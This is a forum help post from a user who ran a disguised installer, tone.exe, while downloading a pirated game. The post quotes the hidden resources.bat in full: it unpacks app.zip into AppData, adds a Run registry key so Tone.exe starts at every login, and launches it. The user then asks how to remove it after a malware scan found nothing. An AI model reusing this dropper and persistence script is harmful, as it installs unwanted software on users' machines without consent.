DOWNLOAD LINK GATHER AT THE END OF THIS CONTENT
Tried downloading a game from steamunlocked
Download link is through uploadhaven. So I just went through it too fast and there's the malware/adware download and then there's the legit one.
So I just ate tone.exe. It was quite obvious it was malware because it
1. Installed something I didn't want
2. Installation has two hidden files (lol), an install link, and then a hidden resources.bat that is opened via the link. Which I can see too bc my folder settings. Anyway.
Well. It was dumb but I did it (I'm sleepy) And this is what resources.bat reads
tar -xvf "app.zip" -C "%APPDATA%" reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Tone /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Tone /t REG_SZ /d "%APPDATA%\Tone\Tone.exe --gFSF7X5gFI" /f start /d "%APPDATA%\Tone" Tone.exe
Okay. So I went and downloaded MBAM instantly. Waiting on MBAM right now. I don't know how or if I should fix my registry.
Thanks.
'kay welp MBAM didn't see a thing. I had it scan through \Users\, which includes appdata, but it didn't think it was an issue I guess. Tragedy. I don't think just deleting that folder in appdata is enough...
Edited by JimmyKarter, Today, 03:49 AM.